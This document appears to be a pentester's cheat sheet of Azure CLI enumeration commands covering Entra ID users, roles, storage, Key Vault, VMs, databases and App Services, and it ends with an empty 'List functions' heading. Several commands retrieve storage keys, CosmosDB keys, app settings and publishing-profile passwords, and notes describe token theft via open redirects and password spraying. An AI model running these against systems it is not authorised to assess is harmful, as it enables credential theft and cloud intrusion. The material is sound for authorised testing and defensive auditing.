# Azure

## 1. Authentication & Setup

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#enumeration)

### User

```bash
export EMAIL=''
export PASSWORD=''
az login -u "$EMAIL" -p "$PASSWORD" [--allow-no-subscriptions]
export SUBSCRIPTION_ID=$(az account show --query id --output tsv)
export TENANT_ID=$(az account show --query tenantId --output tsv)
export MY_OID=$(az ad signed-in-user show --query id -o tsv)
```

### ARM (Service Principal Authentication)

```bash
export ARM_CLIENT_ID=''
export ARM_SECRET=''
export TENANT_ID='fdd066e1-ee37-49bc-b08f-d0e152119b04'
az login --service-principal -u "$ARM_CLIENT_ID" -p "$ARM_SECRET" --tenant "$TENANT_ID" [--allow-no-subscriptions]
export SUBSCRIPTION_ID=$(az account show --query id --output tsv)
export TENANT_ID=$(az account show --query tenantId --output tsv)
export MY_OID=$(az ad sp show --id $ARM_CLIENT_ID --query id -o tsv)
```

### Connection Information

Displays details of the currently authenticated user.

```bash
az ad signed-in-user show
```

Lists all subscriptions accessible by the current identity.

```bash
az account list --output table
```

## 2. Account Enumeration

### Groups

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#groups)

Retrieves every group in the tenant.

```bash
az ad group list -o table
```

Retrieve Azure AD groups and directory roles assigned to the current identity.

```bash
az rest --method get --url "https://graph.microsoft.com/v1.0/me/memberOf" --query "value[].{Name:displayName, ID:id}" -o table
```

Get groups where the user is a member

```bash
az ad user get-member-groups --id $TARGET_EMAIL
```

List dynamic Azure AD groups (membership rule-based)

```bash
az ad group list \
--filter "groupTypes/any(c:c eq 'DynamicMembership')" \
--query "[].{displayName:displayName, rule:membershipRule}" \
-o table
```

### Roles

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#azure-roles)

Get the **Entra ID** roles assigned to the current identity together with their definitions (One Liner)

```bash
for TARGET_ROLE_ID in $(az rest --method get --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$filter=principalId eq '$MY_OID'" --query "value[].roleDefinitionId" -o tsv | sort -u); do
    echo -e "\n\n[+] Checking Entra ID Directory Role ID: $TARGET_ROLE_ID"
    az rest --method GET -o json \
      --query "{RoleName:displayName, Description:description, Actions:rolePermissions[].allowedResourceActions[]}" \
      --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/$TARGET_ROLE_ID"
done
```

Get the Entra ID roles assigned to the current identity together with their definitions (Manual)

```bash
# Role assignments of the current identity (note the RoleID column)
az rest --method get --query "value[].{RoleID:roleDefinitionId, Scope:directoryScopeId}" -o table --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$filter=principalId eq '$MY_OID'"

# Get Role Definition Details for one of the RoleIDs above
az rest --method GET -o json \
  --query "{RoleName:displayName, Description:description, RoleID:id, Actions:rolePermissions[].allowedResourceActions[]}" \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/$TARGET_ROLE_ID"
```

List **Azure Roles** & Show Role actions definitions for a given scope (One Liner)

```bash
az role assignment list --assignee "$MY_OID" --include-inherited --include-groups --all --query "[].{id:roleDefinitionId, scp:scope}" -o tsv | while read -r role_id scope; do
    echo -e "\n\033[1;34m==== Inspecting Role: ${role_id##*/} ====\033[0m"
    echo -e "\033[1;33m[+] Scope:\033[0m $scope"
    # Fetch definition using the ID we just pulled
    az role definition show --id "$role_id" --query "{Name:roleName, Description:description, Actions:permissions[0].actions, DataActions:permissions[0].dataActions}" -o json
done
```

List Azure Roles & Show Role actions definitions for a given scope (Manual)

```bash
# Role assignments of the current identity (note the RoleID column)
az role assignment list --include-inherited --include-groups --all \
  --query "[].{RoleName:roleDefinitionName, RoleID:roleDefinitionId, Scope:scope, Type:principalType}" \
  -o json --assignee "$MY_OID"

# Get Role Definition Details for one of the RoleIDs above
az role definition show \
  --query "{RoleName:roleName, Description:description, RoleID:id, Actions:permissions[0].actions, NotActions:permissions[0].notActions}" \
  -o json --id $TARGET_ROLE_ID
```

Find Custom Azure Roles

```bash
az role definition list --custom-role-only true --query "[].{roleName:roleName, name:name, actions:permissions[0].actions, dataActions:permissions[0].dataActions}"
```

### Service Principals

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#service-principals)

```bash
az ad sp list --all -o table \
  --query "[].{Name:displayName, ObjectId:id, AppId:appId, Type:servicePrincipalType, Enabled:accountEnabled, RedirectURIs:replyUrls}"
```

### Users

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#users)

Enumerate Entra ID users

```bash
az ad user list --output table --query "[].{ID:id,UserPrincipalName:userPrincipalName,DisplayName:displayName}"

# Same data through the Graph API
az rest --method GET --url "https://graph.microsoft.com/v1.0/users" --query "value[].{ID:id, UPN:userPrincipalName, Name:displayName}" -o table
```

## 3. Resources

Get Resource List

```bash
az account set --subscription $SUBSCRIPTION_ID
az resource list --query "[].{Name:name, Type:type, ResourceGroup:resourceGroup}" --output table

# Through API REST
az rest --method GET --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resources?api-version=2021-04-01" \
  --query "value[].{Name:name, Type:type}" \
  -o table
```

Check what actions you can execute on every specific resource after all role inheritance and assignments are calculated.

```bash
# Optional: if you obtained a management-plane token manually, export MANAGEMENT_TOKEN
# and it will be sent explicitly; otherwise the az login session is used.
AUTH_HDR=()
[ -n "$MANAGEMENT_TOKEN" ] && AUTH_HDR=(--headers "Authorization=Bearer $MANAGEMENT_TOKEN")

# 1. List every resource in the subscription
RESOURCES_JSON=$(az rest --method GET --output json "${AUTH_HDR[@]}" \
  --url "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resources?api-version=2021-04-01")

# 2. Process each resource using jq
echo "$RESOURCES_JSON" | jq -c '.value[]' | while read -r resource; do
    # Extract variables from the JSON object
    RES_ID=$(echo "$resource" | jq -r '.id')
    RES_NAME=$(echo "$resource" | jq -r '.name')
    RES_TYPE=$(echo "$resource" | jq -r '.type')

    # Extract resource group from the resource ID string
    RES_RG=$(echo "$RES_ID" | sed -n 's/.*\/resourceGroups\/\([^\/]*\)\/.*/\1/p')

    # Visual separator
    echo "---"
    echo -e "\033[1;35m[#] Resource:\033[0m $RES_NAME"
    echo -e "\033[1;36m[+] Type:\033[0m      $RES_TYPE"
    echo -e "\033[1;32m[+] Group:\033[0m     $RES_RG"

    # 3. Fetch the effective permissions of the current identity on this resource
    PERMS_JSON=$(az rest --method GET --output json "${AUTH_HDR[@]}" \
        --url "https://management.azure.com${RES_ID}/providers/Microsoft.Authorization/permissions?api-version=2022-04-01")

    # 4. Show standard Actions
    echo -e "\033[1;33m[!] Actions:\033[0m"
    echo "$PERMS_JSON" | jq -r '.value[].actions[]' 2>/dev/null | sort -u | sed 's/^/  - /'

    # 5. Show Data Actions
    echo -e "\033[1;33m[!] Data Actions:\033[0m"
    echo "$PERMS_JSON" | jq -r '.value[].dataActions[]' 2>/dev/null | sort -u | sed 's/^/  - /'
done
```

### Identities

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#managed-identities)

List managed identities in the resource group

```bash
az identity list -o table --resource-group $RESOURCE_GROUP
```

### Storage accounts

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-storage.html#enumeration)

Enumerate storage accounts

```bash
az storage account list \
  --query "[].{Name:name, PublicAccess:allowBlobPublicAccess, HttpsOnly:enableHttpsTrafficOnly, MinTLS:minimumTlsVersion, IsHnsEnabled:isHnsEnabled, FTPEnabled:isSftpEnabled, LocalUserEnabled:isLocalUserEnabled, Firewall:networkRuleSet.defaultAction, BlobEndpoint:primaryEndpoints.blob, Location:location}" \
  -o table --resource-group $RESOURCE_GROUP

STORAGE_ACCOUNT_NAME=$(az storage account list --query "[0].name" -o tsv --resource-group $RESOURCE_GROUP)
```

If `Firewall` is set to `Deny`, run the following command to check which IP ranges and virtual networks are still allowed through the network rules.

```bash
az storage account show \
  --name $STORAGE_ACCOUNT_NAME \
  --resource-group $RESOURCE_GROUP \
  --query networkRuleSet \
  --output json
```

Enumerate keys

```bash
az storage account keys list \
  --resource-group $RESOURCE_GROUP \
  --account-name $STORAGE_ACCOUNT_NAME
  
ACCESS_KEY=$(az storage account keys list -g $RESOURCE_GROUP -n $STORAGE_ACCOUNT_NAME --query "[0].value" -o tsv)
```

#### Containers

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-storage.html#enumeration)

Enumerate storage containers for a given account

```bash
az storage container list --include-deleted \
  --query "[].{Name:name, PublicAccess:properties.publicAccess, Metadata:metadata, LastModified:properties.lastModified, Deleted:deleted, Version:version}" \
  -o table --account-name $STORAGE_ACCOUNT_NAME \
  [--auth-mode login | --account-key $ACCESS_KEY]
```

Enumerate files inside the container

```bash
az storage blob list \
  --include v \
  --query "[].{Name:name,VersionId:versionId, IsCurrent:isCurrentVersion, Size:properties.contentLength, Type:properties.contentType, LastModified:properties.lastModified, MD5:properties.contentSettings.contentMd5}" \
  --output table \
  --account-name $STORAGE_ACCOUNT_NAME --container-name <CONTAINER_NAME> \
  [--auth-mode login]
```

Download the file

```bash
az storage blob download \
  --account-name $STORAGE_ACCOUNT_NAME \
  --container-name <CONTAINER_NAME> \
  --name <FILE_NAME> \
  --file <DESTINATION_NAME> \
  [--auth-mode login] \
  [--version-id "2026-05-07T06:54:11.8141618Z"]
```

Script to check every storage account in a resource group, its containers and the files inside them

```bash
export RESOURCE_GROUP=''
# 1. Get all storage accounts in the resource group
az storage account list --resource-group "$RESOURCE_GROUP" --query "[].name" -o tsv | while read -r ACCOUNT_NAME; do
    echo -e "\n\033[1;32m============================================================\033[0m"
    echo -e "\033[1;32m[!] TARGET STORAGE ACCOUNT: $ACCOUNT_NAME\033[0m"

    # 2. Retrieve Important Security Information (Account Level)
    az storage account show --name "$ACCOUNT_NAME" --resource-group "$RESOURCE_GROUP" \
      --query "{Name:name, PublicAccess:allowBlobPublicAccess, FW_Default:networkRuleSet.defaultAction, BlobUrl:primaryEndpoints.blob}" -o table

    # 3. Enumerate Containers
    echo -e "\033[1;33m[+] Enumerating Containers for $ACCOUNT_NAME...\033[0m"
    CONTAINERS=$(az storage container list --account-name "$ACCOUNT_NAME" --auth-mode login --query "[].name" -o tsv 2>/dev/null)

    if [ -z "$CONTAINERS" ]; then
        echo -e "\033[0;31m    [-] Access Denied or No Containers Found.\033[0m"
    else
        for CONTAINER in $CONTAINERS; do
            echo -e "\n  \033[1;40m[#] CONTAINER: $CONTAINER\033[0m"

            # 4. Data Discovery: Retrieve Blobs (Files) within the container
            echo -e "  \033[1;36m[>] Files Found (Data Discovery):\033[0m"
            az storage blob list --account-name "$ACCOUNT_NAME" --container-name "$CONTAINER" \
              --auth-mode login --query "[].{FileName:name, Size:properties.contentLength, Type:properties.blobType, Modified:properties.lastModified}" -o table
        done
    fi
done
```

#### File Shares

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeration)

Enumerate Shares

```bash
az storage share list -o table \
  --include-snapshots --include-metadata \
  --query "[].{Name:name, Snapshot:snapshot, Modified:properties.lastModified, Metadata:metadata}" \
  --account-name $STORAGE_ACCOUNT_NAME \
  [--account-key $ACCESS_KEY]

az storage share-rm list --include-deleted -o table \
  --resource-group $RESOURCE_GROUP \
  --query "[].{Name:name, IsDeleted:deleted, Version:version, DateDeleted:deletedTime, DaysLeft:remainingRetentionDays}" \
  --account-name $STORAGE_ACCOUNT_NAME \
  [--account-key $ACCESS_KEY]
```

Enumerate Files inside the Dir

```bash
az storage file list -o table \
  --account-name $STORAGE_ACCOUNT_NAME \
  --share-name $SHARE_NAME  \
  [--account-key $ACCESS_KEY]
```

Download the file

```bash
az storage file download \
  --account-name $STORAGE_ACCOUNT_NAME \
  --share-name <SHARE_NAME> \
  --path <FILE_NAME> \
  --dest <DESTINATION_NAME> \
  [--account-key $ACCESS_KEY]
```

Create a snapshot of the share (note that `az storage share snapshot` creates a new snapshot; existing snapshots are listed with `az storage share list --include-snapshots`, as in the script below)

```bash
az storage share snapshot \
  --name $SHARE_NAME \
  --account-name $STORAGE_ACCOUNT_NAME
```

For each snapshot in the share name, enumerate its files

```bash
# STORAGE_ACCOUNT_NAME is expected to be set already; SHARE_NAME is the share to inspect
SHARE_NAME=''

# 1. Collect the snapshot timestamps of the share
SNAPSHOTS=$(az storage share list \
    --account-name "$STORAGE_ACCOUNT_NAME" \
    --include-snapshots \
    --query "[?name=='$SHARE_NAME' && snapshot != null].snapshot" \
    -o tsv)

if [ -z "$SNAPSHOTS" ]; then
    echo "No snapshots found for this share."
    exit 0
fi

# 2. Iterate through each snapshot and list the files
for SNAP in $SNAPSHOTS; do
    echo "----------------------------------------------------"
    echo "SNAPSHOT VERSION: $SNAP"
    echo "----------------------------------------------------"

    az storage file list \
        --account-name "$STORAGE_ACCOUNT_NAME" \
        --share-name "$SHARE_NAME" \
        --snapshot "$SNAP" \
        --output table

    echo -e "\n"
done
```

### Applications

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-azuread.html#applications)

Enumerate applications and misconfigurations

```bash
az rest --method get --url "https://graph.microsoft.com/v1.0/applications"   --query "value[].{Name:displayName, AppID:appId, ObjID:id, Public:isFallbackPublicClient, ImpAccess:web.implicitGrantSettings.enableAccessTokenIssuance, ImpID:web.implicitGrantSettings.enableIdTokenIssuance, Redirects:web.redirectUris[0]}"   -o table 
```

1. Implicit Grant (`ImpAccess` / `ImpID`)

* **The Risk:** If `enableAccessTokenIssuance` or `enableIdTokenIssuance` is `true`, the application is using the **Implicit Flow**.
* **Attack:** This flow is legacy and insecure. Tokens are returned directly in the URL fragment (after the `#`), making them susceptible to theft via browser history, logs, or Referer headers.

2. Public Client (`Public`)

* **The Risk:** If this is `true` (or `isFallbackPublicClient` is enabled), the application is considered a "Public Client" (like a mobile app or a script).
* **Attack:** These apps **do not require a Client Secret** to authenticate. If you find a valid username/password (via spraying), you can often authenticate directly against this App ID without needing a secret.

3. Redirect URIs (`Redirects`)

* **The Risk:** These are the URLs where Azure sends the auth token after login.
* **Attack:**
  * **Open Redirects:** If a URI is overly broad (e.g., `https://example.com/*`), you might be able to craft a link that sends the token to a server you control.
  * **Subdomain Takeover:** If one of the listed URLs points to a dead subdomain, you can claim that subdomain and hijack any tokens sent to it.

4. Required Resource Access (Permissions)

If you want to see what this application is actually allowed to **do** (e.g., "Read all Mail," "Directory.ReadWrite.All"), add this to the query:

* `Perms:requiredResourceAccess[].resourceAccess[].id`

See the application's permissions and internal identifier URIs (useful for finding internal domain names).

```bash
az rest --method get --url "https://graph.microsoft.com/v1.0/applications" \
  --query "value[].{Name:displayName, AppID:appId, Identifiers:join(', ', identifierUris), Permissions:requiredResourceAccess[].resourceAccess}" \
  -o json
```
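The checks in points 1 to 4 above, as an added audit script that is not part of the original notes: it flags implicit grant, public-client fallback, wildcard or non-HTTPS redirect URIs and application (`Role`) permissions in the JSON that `az rest --method get --url "https://graph.microsoft.com/v1.0/applications" -o json` returns. The input below is a constructed sample in that shape; the app names, appIds and permission ids are placeholders, and resolving a permission id to a name (such as `Directory.ReadWrite.All`) is left to the reader, as it requires the resource service principal's role definitions.

```python
"""Audit Entra ID app registrations for the misconfigurations listed above.

Added example, not code from the original notes. Input is assumed to be the
Graph /v1.0/applications response: {"value": [ <application>, ... ]}.
"""
import json
from typing import Any, Dict, List

# Constructed sample in the Graph /v1.0/applications shape (two app registrations).
# appIds and permission ids are placeholders, not real identifiers.
SAMPLE_GRAPH_JSON = json.dumps({
    "value": [
        {
            "displayName": "legacy-spa",
            "appId": "00000000-0000-0000-0000-000000000001",
            "isFallbackPublicClient": True,
            "web": {
                "redirectUris": ["https://legacy.contoso.example/*",
                                 "http://localhost:3000/cb"],
                "implicitGrantSettings": {"enableAccessTokenIssuance": True,
                                          "enableIdTokenIssuance": False},
            },
            "requiredResourceAccess": [
                {"resourceAppId": "00000003-0000-0000-c000-000000000000",  # Microsoft Graph
                 "resourceAccess": [{"id": "placeholder-perm-1", "type": "Role"},
                                    {"id": "placeholder-perm-2", "type": "Scope"}]}
            ],
        },
        {
            "displayName": "tidy-api",
            "appId": "00000000-0000-0000-0000-000000000002",
            "isFallbackPublicClient": None,
            "web": {
                "redirectUris": ["https://api.contoso.example/signin-oidc"],
                "implicitGrantSettings": {"enableAccessTokenIssuance": False,
                                          "enableIdTokenIssuance": False},
            },
            "requiredResourceAccess": [],
        },
    ]
})


def audit_app(app: Dict[str, Any]) -> List[str]:
    """Return finding tags for one application object (empty list = nothing flagged)."""
    findings: List[str] = []
    web = app.get("web") or {}
    implicit = web.get("implicitGrantSettings") or {}

    # 1. Implicit grant: tokens returned in the URL fragment
    if implicit.get("enableAccessTokenIssuance"):
        findings.append("implicit-flow-access-token")
    if implicit.get("enableIdTokenIssuance"):
        findings.append("implicit-flow-id-token")

    # 2. Public client: no client secret required to authenticate
    if app.get("isFallbackPublicClient"):
        findings.append("public-client")

    # 3. Redirect URIs: wildcards and non-HTTPS endpoints are reported for review
    for uri in web.get("redirectUris") or []:
        if "*" in uri:
            findings.append(f"wildcard-redirect:{uri}")
        elif not uri.startswith("https://"):
            findings.append(f"non-https-redirect:{uri}")

    # 4. Required resource access: "Role" entries are application permissions,
    #    which act without a signed-in user and deserve a closer look
    app_perms = sum(
        1
        for rra in app.get("requiredResourceAccess") or []
        for ra in rra.get("resourceAccess") or []
        if ra.get("type") == "Role"
    )
    if app_perms:
        findings.append(f"application-permissions:{app_perms}")
    return findings


def audit_graph_output(raw_json: str) -> Dict[str, List[str]]:
    """Map each appId in a Graph /applications response to its findings."""
    apps = json.loads(raw_json).get("value", [])
    return {app["appId"]: audit_app(app) for app in apps}


if __name__ == "__main__":
    # Replace SAMPLE_GRAPH_JSON with the contents of the az rest output to audit a tenant
    for app_id, findings in audit_graph_output(SAMPLE_GRAPH_JSON).items():
        status = ", ".join(findings) if findings else "no findings"
        print(f"{app_id}: {status}")
```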

Identify the target app

```bash
APP_ID=$(az ad app list --query "[?contains(displayName, 'azure-applications-lab-1-phishing-app')].appId | [0]" -o tsv); echo "$APP_ID"
```

Identify users or service principals that have administrative rights over this application.

```bash
az ad app owner list \
  --query "[].{Name:displayName, Type:principalType, UPN:userPrincipalName, ID:id}" \
  -o table --id "$APP_ID"
```

### KeyVault

[More commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-keyvault.html#enumeration)

```bash
# RBAC=true means Azure RBAC authorisation; RBAC=false means the vault uses access policies
az keyvault list --resource-group $RESOURCE_GROUP --query "[].{Name:name, URI:properties.vaultUri, Public:properties.publicNetworkAccess, RBAC:properties.enableRbacAuthorization, PolicyCount:length(properties.accessPolicies || \`[]\`)}" --output table
```

Who has access to the key vault

```bash
az keyvault show --name $KEYVAULT_NAME --query "properties.accessPolicies[].{OID:objectId, Permissions:permissions.secrets}" --output table
```

Enumerate KeyVault keys

```bash
az keyvault key list --vault-name $KEYVAULT_NAME
```

Enumerate KeyVault secrets

```bash
az keyvault secret list --query "[].{name:name}" -o tsv --vault-name $KEYVAULT_NAME
```

### VMs

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/vms/index.html#vm-enumeration)

```bash
# If you get the error "does not have authorization to perform action 'Microsoft.Network/networkInterfaces/read'", remove "--show-details"
az vm list --show-details --query "[].{Name:name, RG:resourceGroup, OS:storageProfile.osDisk.osType, PublicIP:publicIps, PrivateIP:privateIps, Status:powerState, Identity:identity.type, Size:hardwareProfile.vmSize}" --output table
```

Obtain Machine user identities

```bash
az vm show \
  --name "$VM_NAME" \
  --resource-group "$RESOURCE_GROUP" \
  --query "{SystemIdentityOID:identity.principalId, UserIdentities:identity.userAssignedIdentities}" \
  --output json
```

### Disks

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/vms/index.html#disks--snapshots)

```bash
az disk list --query "[].{
    Name: name,
    RG: resourceGroup,
    SizeGB: diskSizeGb,
    State: managedBy == \`null\` && 'UNATTACHED' || 'Attached',
    VM: managedBy,
    Encryption: encryption.type,
    NetworkPolicy: networkAccessPolicy,
    PublicAccess: publicNetworkAccess,
    CreatedFrom: creationData.sourceResourceId
}" --output table --resource-group "$RESOURCE_GROUP"
```

### Table Storage

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeration)

### MSSQL

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-sql.html#enumeration)

Enumerate servers

```bash
az sql server list --expand-ad-admin --query "[].{Name:name, FQDN:fullyQualifiedDomainName, PublicAccess:publicNetworkAccess,restrictOutboundNetworkAccess:restrictOutboundNetworkAccess, ResourceGroup:resourceGroup, Admin:administratorLogin, EntraAdmin:externalAdministrator.login, AdminType:externalAdministrator.principalType, AdminSID:externalAdministrator.sid}" --output table
```

Identify information from a given server

```bash
# List Server Usages
az sql server list-usages --name $SQL_SERVER --resource-group $RESOURCE_GROUP

# List Server Firewalls
az sql server firewall-rule list --output table \
  --query "[].{Rule:name, Start:startIpAddress, End:endIpAddress}" \
  --resource-group $RESOURCE_GROUP --server $SQL_SERVER

# List the Azure Active Directory administrators of the server
az sql server ad-admin list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{Admin:login, Type:principalType, Tenant:tenantId, SID:sid}" --output table

# Advanced Threat Protection setting
az sql server advanced-threat-protection-setting show --resource-group $RESOURCE_GROUP --name $SQL_SERVER --output json

# DNS Aliases
az sql server dns-alias list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{Alias:name}" --output table

# Server Keys
az sql server key list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{KeyName:name, URI:uri, Type:serverKeyType}" --output table

# Server Encryption Protector (TDE key)
az sql server tde-key show --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "{KeyName:serverKeyName, Type:serverKeyType}" --output json
```

Obtain information from the database perspective

```bash
# List databases
az sql db list --query "[].{Name:name, Status:status, Tier:sku.tier, Ledger:ledgerOn, InfraEncrypt:isInfraEncryptionEnabled, Backup:currentBackupStorageRedundancy}" --output table --server $SQL_SERVER --resource-group $RESOURCE_GROUP

# List deleted SQL databases
az sql db list-deleted --server $SQL_SERVER --resource-group $RESOURCE_GROUP

# DB Metadata Info
az sql db show --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP --query "{Name:name, TDE:transparentDataEncryption.status, Ledger:ledgerConfiguration.ledgerState, Identity:identity.type, ZoneRedundant:zoneRedundant, CreateDate:creationDate, isInfraEncryptionEnabled:isInfraEncryptionEnabled}" --output json

# DB Usage
az sql db list-usages --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP \
  --query "[].{Metric:displayName, CurrentValue:currentValue, Limit:limit, Unit:unit}" \
  --output table

# Threat Policy
az sql db threat-policy show --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP

# Data Masking policy and rules (through the REST API)
az rest --method GET --uri "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Sql/servers/$SQL_SERVER/databases/$DB_NAME/dataMaskingPolicies/Default?api-version=2021-11-01" | jq .

az rest --method GET --uri "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Sql/servers/$SQL_SERVER/databases/$DB_NAME/dataMaskingPolicies/Default/rules?api-version=2021-11-01" | jq .

# Row-Level Security policies (requires a database login)
sqlcmd -S $SQL_SERVER.database.windows.net -d $DB_NAME -U "$DB_USER" -P "$DB_PASSWORD" \
  -W -s "," -Q "SELECT sp.name, sp.is_enabled, OBJECT_NAME(sp.object_id) AS TableName, sp2.predicate_definition FROM sys.security_policies AS sp JOIN sys.security_predicates AS sp2 ON sp.object_id = sp2.object_id;" \
  | column -s, -t
```

### MySQL

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-mysql.html#enumeration)

Enumerate Database Servers

```bash
az mysql flexible-server list --output table --resource-group $RESOURCE_GROUP --query "[].{Server:name, FQDN:fullyQualifiedDomainName, Port:databasePort, Version:version, Admin:administratorLogin, PublicAccess:network.publicNetworkAccess, EntraAuth:authConfig.activeDirectoryAuth, HA:highAvailability.mode, Tier:sku.tier}" 
```

Enumerate Databases

```bash
az mysql flexible-server db list --output table \
  --query '[].{Name:name, collation:collation, resourceGroup:resourceGroup, systemData:systemData}' \
  --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
```

Firewall Rules

```bash
az mysql flexible-server firewall-rule list --query "[].{RuleName:name, Start:startIpAddress, End:endIpAddress}" --output table \
--resource-group $RESOURCE_GROUP --name $SERVER_NAME
```

List AD admins and users

```bash
az mysql flexible-server ad-admin list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
az mysql flexible-server identity list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
```

List backups and replicas

```bash
az mysql flexible-server backup list --resource-group $RESOURCE_GROUP --name $SERVER_NAME

az mysql flexible-server replica list --resource-group $RESOURCE_GROUP --name $SERVER_NAME
```

**Enumerate Monitoring Mechanisms**

Get the server's advanced threat protection setting

```bash
az mysql flexible-server advanced-threat-protection-setting show --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
```

Audit Logging Enabled

```bash
az mysql flexible-server parameter show --name "audit_log_enabled" \
--query "{Parameter:name, Status:value}" \
--resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
```

List all of the maintenances of a flexible server

```bash
az mysql flexible-server maintenance list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
```

List log files for a server

```bash
az mysql flexible-server server-logs list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
```

### PostgreSQL

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeration)

Database Servers

```bash
az postgres flexible-server list --output table \
  --query "[].{Server:name, FQDN:fullyQualifiedDomainName, Version:version, Admin:administratorLogin, PublicAccess:network.publicNetworkAccess, EntraAuth:authConfig.activeDirectoryAuth, PwdAuth:authConfig.passwordAuth, Tier:sku.tier}" \
  --resource-group $RESOURCE_GROUP 
```

Databases

```bash
az postgres flexible-server db list \
  --resource-group $RESOURCE_GROUP \
  --server-name $SERVER_NAME \
  --query "[].{Name:name, ResourceGroup:resourceGroup, SystemData:systemData}" \
  --output table
```

Enumerate Firewalls

```bash
az postgres flexible-server firewall-rule list \
  --query "[].{Rule:name, Start:startIpAddress, End:endIpAddress}" \
  --output table \
  --resource-group $RESOURCE_GROUP --name $SERVER_NAME
```

### CosmosDB

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-cosmosDB.html#enumeration)

Enumerate Instances

```bash
az cosmosdb list -o table \
  --query "[].{Name:name, Kind:kind, Endpoint:documentEndpoint, PublicAccess:publicNetworkAccess, NetworkBypass:networkAclBypass, Location:location,NoVnet:isVirtualNetworkFilterEnabled, LocalAuth:disableLocalAuth}" \
  --resource-group $RESOURCE_GROUP
```

Obtain keys

```bash
az cosmosdb keys list --resource-group $RESOURCE_GROUP --name $SERVER_NAME
```

### MongoDB

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-cosmosDB.html#enumeration-1)

```bash
az cosmosdb list --resource-group $RESOURCE_GROUP \
  --query "[].{Name:name, Kind:kind, PublicAccess:publicNetworkAccess, LocalAuth:disableLocalAuth, IpRules:ipRules, Endpoint:documentEndpoint}" \
  -o table
```

### App Services

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-app-services.html#enumeration)

```bash
az webapp list --query "[].{Name:name,resourcegroup:resourceGroup, Host:defaultHostName, SCM:enabledHostNames[1], HTTPS_Only:httpsOnly, Runtime:siteConfig.linuxFxVersion || siteConfig.windowsFxVersion,State:state, Public_Access:publicNetworkAccess, Identity:identity.type, ClientCert:clientCertMode,CORS:cors,RemoteDebug:remoteDebuggingEnabled, WebSockets:webSocketsEnabled}" --output json
```

Get the App Settings (API Keys, DB Strings, etc.)

```bash
az webapp config appsettings list --resource-group $RESOURCE_GROUP --name $WEBAPP_NAME
```

Retrieve the publishing profiles (these contain deployment credentials)

```bash
az webapp deployment list-publishing-profiles \
  --name $WEBAPP_NAME \
  --resource-group $RESOURCE_GROUP \
  --query "[].{Profile:profileName, Method:publishMethod, URL:publishUrl, User:userName, Password:userPWD,SQLServerDBConnectionString:SQLServerDBConnectionString,destinationAppUrl:destinationAppUrl}" \
  -o json
```

### Azure Container Registry

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration)

```bash
az acr list --query "[].{Name:name, Server:loginServer, SKU:sku.name, PublicAccess:publicNetworkAccess, AdminUser:adminUserEnabled, AnonPull:anonymousPullEnabled, Region:location}" -o table
```

### Function Apps

[Enumeration Commands](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeration)

```bash
az functionapp list --query "[].{Name:name,defaultHostName:defaultHostName,hostNames:hostNames,hostNamesDisabled:hostNamesDisabled, RG:resourceGroup, Runtime:functionAppConfig.runtime.name, Identity:identity.type, PrincipalID:identity.principalId, StorageURL:functionAppConfig.deployment.storage.value, HTTPS:httpsOnly}" -o json
```

List functions

```bash
